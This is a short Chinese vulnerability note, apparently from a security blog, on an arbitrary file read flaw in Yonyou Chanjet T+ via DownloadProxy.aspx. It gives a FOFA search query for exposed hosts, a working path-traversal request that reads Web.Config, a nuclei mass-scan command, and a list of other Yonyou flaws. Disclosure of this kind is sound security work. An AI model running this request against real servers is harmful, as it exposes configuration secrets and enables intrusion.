用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

漏洞描述

用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器上的敏感文件
漏洞影响

1. 用友 畅捷通T+

复制代码

FOFA

1. app="畅捷通-TPlus"

复制代码

漏洞复现

登录页面

验证POC

1. /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config

复制代码

 nuclei-pocs

nuclei -t nuclei -t yonyou_changjietong_readfile_DownloadProxy.yaml -l url.txt

 
 
nuclei-poc  关注北极星sec公众号回复0921获取
 

 
 
用友漏洞待更新记录

• 用友 U8 OA test.jsp SQL注入漏洞
  
• 用友nc v6.5 远程命令执行漏洞 （CNVD-2021-30167）
  
• 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
  

• 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞
  
• 用友 NCCloud FS文件管理SQL注入
  
• 用友 NC NCFindWeb 任意文件读取漏洞
  
• 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
  
• 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923
  
• 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞
  
• 用友 ERP-NC NCFindWeb 目录遍历漏洞
  
• 用友nc v6.5 反序列化漏洞 补丁绕过
  
• 用友nc v6.5 反序列化漏洞
  
• 用友nc v6.5 反射型xss
  
• 用友nc v6.5 前台任意文件上传漏洞
  
• （CNVD-2021-37786）用友nc Cloud FS 文件管理系统 任意账户登录漏洞
  
• 用友 GRP-u8 前台存在任意文件上传漏洞
  
• 用友nc IUFO v5.3 反射型xss
  
• 用友nc 控制台绕过漏洞
  
• 用友nc 数据库密码解密
  

 

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！